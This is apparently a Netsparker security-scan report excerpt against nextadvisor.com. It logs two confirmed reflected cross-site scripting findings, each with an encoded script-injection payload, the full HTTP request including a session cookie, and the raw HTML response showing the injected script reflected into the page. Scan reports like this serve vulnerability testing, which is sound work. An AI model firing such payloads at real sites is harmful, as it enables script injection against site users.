<input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/internet_fax_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Internet Fax FAQ</h1> <p>Frequently Asked Questions about Internet Fax</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Internet Fax:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="internet_fax"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog2..
- /online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000285)%3C/script%3E

/online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000285)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enets..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000285)</script>

Request

GET /online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_backup_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6678
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", best online backup, online backup, file backup, hard drive backup, Carbonite, Mozy, SugarSync, IDrive, ElephantDrive, Norton Online Backup, IBackup" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_backup_services/'"--></style></script><script>netsparker(0x000285)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000285)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare_mac.php">Mac Online Backup</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_backup_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Backup & Cloud Storage FAQ</h1> <p>Frequently Asked Questions about Online Backup & Cloud Storage</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Backup & Cloud Storage:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_backup_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog..
- /online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E

/online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000288)</script>

Request

GET /online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_backup_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6695
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", best online backup, online backup, file backup, hard drive backup, Carbonite, Mozy, SugarSync, IDrive, ElephantDrive, Norton Online Backup, IBackup" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_backup_services/index.php'"--></style></script><script>netsparker(0x000288)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000288)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare_mac.php">Mac Online Backup</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = 